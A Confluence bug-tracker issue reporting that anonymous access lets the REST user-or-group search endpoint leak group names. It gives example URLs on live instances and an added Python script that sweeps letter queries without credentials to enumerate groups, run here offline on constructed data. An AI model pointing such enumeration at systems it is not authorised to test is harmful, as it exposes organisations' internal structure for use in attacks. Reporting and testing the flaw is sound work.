Confluence leaks group names when anonymous access is enabled



      Issue Summary

      As a side effect of allowing anonymous access to Confluence, the REST API leaks information such as group names. If your organisation uses this information for verification or authentication elsewhere, it could be used to mount an attack. Group names may also contain information that would violate the GDPR if made freely available.

      Environment

      Any Confluence instance that has anonymous access allowed at some level. Some online examples:

      https://wiki.akraino.org/rest/prototype/1/search/user-or-group.json?max-results=50&query=a
      https://confluence.atlassian.com/rest/prototype/1/search/user-or-group.json?max-results=50&query=a
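      The following script is an added example and is not part of the original issue or of Confluence itself. It reproduces the check behind the links above: it requests the same user-or-group search endpoint with no session cookie or Authorization header, sweeps single-character queries, and collects whatever group names come back. The response shape it parses (a top-level "result" list whose entries carry a "type" of "user" or "group" and a "name" for groups) is an assumption, as are the sample responses and the hostname confluence.example.com; a fetcher is injected so the example runs offline against constructed data.

```python
"""Anonymous group-name probe for the Confluence prototype search endpoint.

Added example, not code from the issue or from Atlassian. Assumptions:
  * the endpoint returns JSON with a top-level "result" list whose entries
    have a "type" field ("user"/"group") and, for groups, a "name" field;
  * the instance allows anonymous access, so no cookie or auth header is sent.
"""
import json
import string
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List, Set

ENDPOINT = "/rest/prototype/1/search/user-or-group.json"


def build_url(base_url: str, query: str, max_results: int = 50) -> str:
    """Build the search URL in the same form as the issue's example links."""
    params = urllib.parse.urlencode({"max-results": max_results, "query": query})
    return f"{base_url.rstrip('/')}{ENDPOINT}?{params}"


def fetch_anonymous(url: str, timeout: float = 10.0) -> str:
    """Fetch with no session cookie and no Authorization header, so the body
    reflects exactly what an unauthenticated client is shown."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_group_names(payload: str) -> List[str]:
    """Return group names from one response body (assumed shape, see above).
    Non-JSON or unexpected shapes yield an empty list rather than raising,
    so a login page or an error page is reported as 'nothing leaked'."""
    try:
        data = json.loads(payload)
    except ValueError:
        return []
    results = data.get("result", []) if isinstance(data, dict) else []
    names: List[str] = []
    for entry in results:
        if isinstance(entry, dict) and entry.get("type") == "group":
            name = entry.get("name")
            if isinstance(name, str):
                names.append(name)
    return names


def enumerate_groups(base_url: str,
                     fetcher: Callable[[str], str] = fetch_anonymous,
                     queries: Iterable[str] = string.ascii_lowercase,
                     max_results: int = 50) -> Set[str]:
    """Sweep the given queries (a..z by default) and union the group names.
    The endpoint caps results per query, so if a query returns exactly
    max_results groups, extend `queries` to two-character prefixes."""
    found: Set[str] = set()
    for q in queries:
        found.update(extract_group_names(fetcher(build_url(base_url, q, max_results))))
    return found


# Constructed sample responses keyed by query letter, in the assumed shape.
SAMPLE_RESPONSES = {
    "a": json.dumps({"result": [
        {"type": "user", "username": "alice", "displayName": "Alice Example"},
        {"type": "group", "name": "acme-hr-payroll"},
        {"type": "group", "name": "acme-confluence-editors"},
    ]}),
    "c": json.dumps({"result": [
        {"type": "group", "name": "confluence-administrators"},
        {"type": "group", "name": "confluence-users"},
        {"type": "group", "name": "acme-confluence-editors"},  # also matched "a"
    ]}),
}


def fake_fetch(url: str) -> str:
    """Offline stand-in for fetch_anonymous, serving the constructed samples."""
    q = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)["query"][0]
    return SAMPLE_RESPONSES.get(q, '{"result": []}')


def demo() -> Set[str]:
    """Run the sweep against the constructed samples (hypothetical hostname)."""
    return enumerate_groups("https://confluence.example.com", fetcher=fake_fetch)


if __name__ == "__main__":
    groups = demo()
    print(f"{len(groups)} group names visible anonymously:")
    for g in sorted(groups):
        print("  ", g)
```

      To run it against a real instance you control, drop the `fetcher=fake_fetch` argument so `fetch_anonymous` is used; an empty result set either means the instance does not leak group names anonymously or that the response does not match the assumed shape, so inspect one raw body before trusting a negative.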

      Suggested behaviour

      An option to prevent this information from leaking when anonymous access is enabled. Some external infrastructure changes could block this access, but it is not a given that they can be implemented on the instance concerned. This should be part of Confluence's default settings.

            Assignee: Unassigned
            Reporter: Will Masters (Inactive)
            Votes: 3
            Watchers: 4